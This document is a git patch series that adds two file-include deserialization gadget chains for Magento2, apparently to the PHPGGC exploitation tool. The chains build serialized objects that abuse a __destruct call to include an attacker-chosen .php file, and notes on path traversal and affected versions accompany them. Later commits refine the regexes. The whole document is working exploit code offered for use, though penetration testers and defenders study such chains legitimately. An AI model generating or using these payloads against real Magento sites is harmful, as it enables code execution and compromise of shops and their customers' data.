From c19ab2b91bf24aa243150c0fb07adeab92821ae4 Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Tue, 26 Nov 2024 11:24:30 +0000
Subject: [PATCH 1/4] two FI Gadget Chains for Magento2

---
 gadgetchains/Magento2/FI/1/chain.php   | 34 +++++++++++++++++++++
 gadgetchains/Magento2/FI/1/gadgets.php | 18 +++++++++++
 gadgetchains/Magento2/FI/2/chain.php   | 41 ++++++++++++++++++++++++++
 gadgetchains/Magento2/FI/2/gadgets.php | 33 +++++++++++++++++++++
 4 files changed, 126 insertions(+)
 create mode 100644 gadgetchains/Magento2/FI/1/chain.php
 create mode 100644 gadgetchains/Magento2/FI/1/gadgets.php
 create mode 100644 gadgetchains/Magento2/FI/2/chain.php
 create mode 100644 gadgetchains/Magento2/FI/2/gadgets.php

diff --git a/gadgetchains/Magento2/FI/1/chain.php b/gadgetchains/Magento2/FI/1/chain.php
new file mode 100644
index 00000000..807a5742
--- /dev/null
+++ b/gadgetchains/Magento2/FI/1/chain.php
@@ -0,0 +1,34 @@
+<?php
+
+namespace GadgetChain\Magento2;
+
+class FI1 extends \PHPGGC\GadgetChain\FileInclude
+{
+    public static $version = '2.3.0 <= 2.4.7+';
+    public static $vector = '__destruct';
+    public static $author = 'mcdruid';
+    public static $information = 'Your included file must end in .php
+    The include uses path traversal to try to get back to the docroot (typically
+    the "pub" directory). So the target path can be relative to that, or can use
+    more path traversal to resolve elsewhere. For example a target of "evil.php"
+    might result in include being called on:
+    /path/to/magento2/generated/metadata/rsl::/../../../pub/evil.php';
+
+    public function process_parameters(array $parameters)
+    {
+        $parameters = parent::process_parameters($parameters);
+        // Remove the .php suffix if it has been specified, as it will be added
+        // by the application.
+        $parameters['remote_path'] = preg_replace('#.php$#', '', $parameters['remote_path']);
+        $parameters['remote_path'] = '/../../../pub/' . ltrim($parameters['remote_path'], '/');
+        return $parameters;
+    }
+
+    public function generate(array $parameters)
+    {
+        return new \Magento\Framework\Cache\Backend\RemoteSynchronizedCache(
+            new \Magento\Framework\App\ObjectManager\ConfigLoader\Compiled(),
+            $parameters['remote_path']
+        );
+    }
+}
diff --git a/gadgetchains/Magento2/FI/1/gadgets.php b/gadgetchains/Magento2/FI/1/gadgets.php
new file mode 100644
index 00000000..bc383f52
--- /dev/null
+++ b/gadgetchains/Magento2/FI/1/gadgets.php
@@ -0,0 +1,18 @@
+<?php
+
+namespace Magento\Framework\Cache\Backend {
+    class RemoteSynchronizedCache {
+        private $remote;
+        private $lockList = [];
+
+        function __construct($remote, $lockList) {
+            $this->remote = $remote;
+            $this->lockList[] = $lockList;
+        }
+    }
+}
+
+namespace Magento\Framework\App\ObjectManager\ConfigLoader {
+    class Compiled {
+    }
+}
\ No newline at end of file
diff --git a/gadgetchains/Magento2/FI/2/chain.php b/gadgetchains/Magento2/FI/2/chain.php
new file mode 100644
index 00000000..07c02bf8
--- /dev/null
+++ b/gadgetchains/Magento2/FI/2/chain.php
@@ -0,0 +1,41 @@
+<?php
+
+namespace GadgetChain\Magento2;
+
+class FI2 extends \PHPGGC\GadgetChain\FileInclude
+{
+    public static $version = '2.4.1 <= 2.4.7+';
+    public static $vector = '__destruct';
+    public static $author = 'mcdruid';
+    public static $information = 'Your included file must end in .php
+    Magento2 will add a prefix of "rsl::" to the filename. So if you specify
+    /path/to/evil.php the target file should be at /path/to/rsl::evil.php
+    A path relative to the docroot (typically "pub") should also work.
+    The path is checked with file_exists() so basic path traversal does not
+    overcome the prefixing of the filename.';
+
+    public function process_parameters(array $parameters)
+    {
+        $parameters = parent::process_parameters($parameters);
+        // Remove the prefix and suffix if they have been specified, as they
+        // will be added by the application.
+        $parameters['remote_path'] = preg_replace('#(^rsl::|.php$)#', '', $parameters['remote_path']);
+        return $parameters;
+    }
+
+    public function generate(array $parameters)
+    {
+        $file = basename($parameters['remote_path']);
+        $dir = dirname($parameters['remote_path']);
+
+        return new \Magento\Framework\Cache\Backend\RemoteSynchronizedCache(
+            new \Magento\Framework\Interception\PluginListGenerator(
+                new \Magento\Framework\App\Filesystem\DirectoryList(
+                  $dir,
+                  'metadata'
+                )
+            ),
+            $file
+        );
+    }
+}
diff --git a/gadgetchains/Magento2/FI/2/gadgets.php b/gadgetchains/Magento2/FI/2/gadgets.php
new file mode 100644
index 00000000..14a2d847
--- /dev/null
+++ b/gadgetchains/Magento2/FI/2/gadgets.php
@@ -0,0 +1,33 @@
+<?php
+
+namespace Magento\Framework\Cache\Backend {
+    class RemoteSynchronizedCache {
+        private $remote;
+        private $lockList = [];
+
+        function __construct($remote, $lockList) {
+            $this->remote = $remote;
+            $this->lockList[] = $lockList;
+        }
+    }
+}
+
+namespace Magento\Framework\Interception {
+    class PluginListGenerator {
+        private $directoryList;
+
+        function __construct($directoryList) {
+            $this->directoryList = $directoryList;
+        }
+    }
+}
+
+namespace Magento\Framework\App\Filesystem {
+    class DirectoryList {
+        private $directories;
+
+        function __construct($file, $id) {
+            $this->directories[$id]['path'] = $file;
+        }
+    }
+}
\ No newline at end of file

From d09f65e1407acd25ead8b3adb72d39bcdad105cb Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Tue, 26 Nov 2024 15:09:11 +0000
Subject: [PATCH 2/4] make regex patterns case-insensitive for removal of
 prefix/suffix

---
 gadgetchains/Magento2/FI/1/chain.php | 2 +-
 gadgetchains/Magento2/FI/2/chain.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/gadgetchains/Magento2/FI/1/chain.php b/gadgetchains/Magento2/FI/1/chain.php
index 807a5742..0625f890 100644
--- a/gadgetchains/Magento2/FI/1/chain.php
+++ b/gadgetchains/Magento2/FI/1/chain.php
@@ -19,7 +19,7 @@ public function process_parameters(array $parameters)
         $parameters = parent::process_parameters($parameters);
         // Remove the .php suffix if it has been specified, as it will be added
         // by the application.
-        $parameters['remote_path'] = preg_replace('#.php$#', '', $parameters['remote_path']);
+        $parameters['remote_path'] = preg_replace('#.php$#i', '', $parameters['remote_path']);
         $parameters['remote_path'] = '/../../../pub/' . ltrim($parameters['remote_path'], '/');
         return $parameters;
     }
diff --git a/gadgetchains/Magento2/FI/2/chain.php b/gadgetchains/Magento2/FI/2/chain.php
index 07c02bf8..07d03c06 100644
--- a/gadgetchains/Magento2/FI/2/chain.php
+++ b/gadgetchains/Magento2/FI/2/chain.php
@@ -19,7 +19,7 @@ public function process_parameters(array $parameters)
         $parameters = parent::process_parameters($parameters);
         // Remove the prefix and suffix if they have been specified, as they
         // will be added by the application.
-        $parameters['remote_path'] = preg_replace('#(^rsl::|.php$)#', '', $parameters['remote_path']);
+        $parameters['remote_path'] = preg_replace('#(^rsl::|.php$)#i', '', $parameters['remote_path']);
         return $parameters;
     }
 

From ae85d9a359644a00d7cd4ca8958859127d6e1247 Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Tue, 26 Nov 2024 16:42:56 +0000
Subject: [PATCH 3/4] do not anchor prefix pattern so it works for absolute
 paths too

---
 gadgetchains/Magento2/FI/2/chain.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/gadgetchains/Magento2/FI/2/chain.php b/gadgetchains/Magento2/FI/2/chain.php
index 07d03c06..18c16d50 100644
--- a/gadgetchains/Magento2/FI/2/chain.php
+++ b/gadgetchains/Magento2/FI/2/chain.php
@@ -19,7 +19,7 @@ public function process_parameters(array $parameters)
         $parameters = parent::process_parameters($parameters);
         // Remove the prefix and suffix if they have been specified, as they
         // will be added by the application.
-        $parameters['remote_path'] = preg_replace('#(^rsl::|.php$)#i', '', $parameters['remote_path']);
+        $parameters['remote_path'] = preg_replace('#(rsl::|.php$)#i', '', $parameters['remote_path']);
         return $parameters;
     }
 

From a4cb3930f6d604f52e43d1f4bc0ce7b4c25e5cb5 Mon Sep 17 00:00:00 2001
From: mcdruid <drew@mcdruid.co.uk>
Date: Tue, 26 Nov 2024 20:22:34 +0000
Subject: [PATCH 4/4] escape dots in the regex patterns

---
 gadgetchains/Magento2/FI/1/chain.php | 2 +-
 gadgetchains/Magento2/FI/2/chain.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/gadgetchains/Magento2/FI/1/chain.php b/gadgetchains/Magento2/FI/1/chain.php
index 0625f890..ac9a1d01 100644
--- a/gadgetchains/Magento2/FI/1/chain.php
+++ b/gadgetchains/Magento2/FI/1/chain.php
@@ -19,7 +19,7 @@ public function process_parameters(array $parameters)
         $parameters = parent::process_parameters($parameters);
         // Remove the .php suffix if it has been specified, as it will be added
         // by the application.
-        $parameters['remote_path'] = preg_replace('#.php$#i', '', $parameters['remote_path']);
+        $parameters['remote_path'] = preg_replace('#\.php$#i', '', $parameters['remote_path']);
         $parameters['remote_path'] = '/../../../pub/' . ltrim($parameters['remote_path'], '/');
         return $parameters;
     }
diff --git a/gadgetchains/Magento2/FI/2/chain.php b/gadgetchains/Magento2/FI/2/chain.php
index 18c16d50..b0c9e014 100644
--- a/gadgetchains/Magento2/FI/2/chain.php
+++ b/gadgetchains/Magento2/FI/2/chain.php
@@ -19,7 +19,7 @@ public function process_parameters(array $parameters)
         $parameters = parent::process_parameters($parameters);
         // Remove the prefix and suffix if they have been specified, as they
         // will be added by the application.
-        $parameters['remote_path'] = preg_replace('#(rsl::|.php$)#i', '', $parameters['remote_path']);
+        $parameters['remote_path'] = preg_replace('#(rsl::|\.php$)#i', '', $parameters['remote_path']);
         return $parameters;
     }